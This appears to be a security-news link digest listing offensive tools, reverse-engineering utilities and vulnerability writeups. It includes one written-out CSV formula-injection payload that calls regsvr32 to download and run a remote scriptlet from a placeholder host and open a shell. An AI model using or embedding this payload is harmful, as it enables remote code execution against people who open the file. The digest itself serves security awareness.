[Tools] A PowerShell one-liner that retrieves WDigest passwords from memory

https://github.com/giMini/mimiDbg

 

[Tools] Invoke-MacroCreator: a PowerShell script for creating Word documents with a VBA macro that can execute various payloads
https://github.com/Arno0x/PowerShellScripts/tree/master/MacroCreator

 

[Tools] A tool to decompile and extract Android Dex bytecode from Vdex files

https://github.com/anestisb/vdexExtractor

 

[Tools] IDA debugging plugin for Android
https://github.com/zhkl0228/AndroidAttacher

 

[Vulnerability] Lenovo OEM-installed crapware comes with a nice Code Execution feature! Could be used to bypass app whitelisting or privesc (guest account to main user)
http://riscy.business/2017/12/lenovos-unsecured-objects/

 

[Tools] Linux memory encryption key extraction tool
https://github.com/cryptolok/crykex

 

[Tutorial] Running Metasploit on Debian 7.5 mipsel Ci20
https://astr0baby.wordpress.com/2017/12/10/running-metasploit-framework-on-debian-7-5-mipsel-ci20/

 

Getting a shell through a .csv file without powershell.exe

fillerText1,fillerText2,fillerText3,=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''

https://twitter.com/G0ldenGunSec/status/939215702073991168

 

[Vulnerability] iOS/macOS – Kernel Double Free due to IOSurfaceRootUserClient not Respecting MIG Ownership Rules
https://www.exploit-db.com/exploits/43320/

 

[Vulnerability] MikroTik 6.40.5 ICMP – Denial of Service
https://www.exploit-db.com/exploits/43317/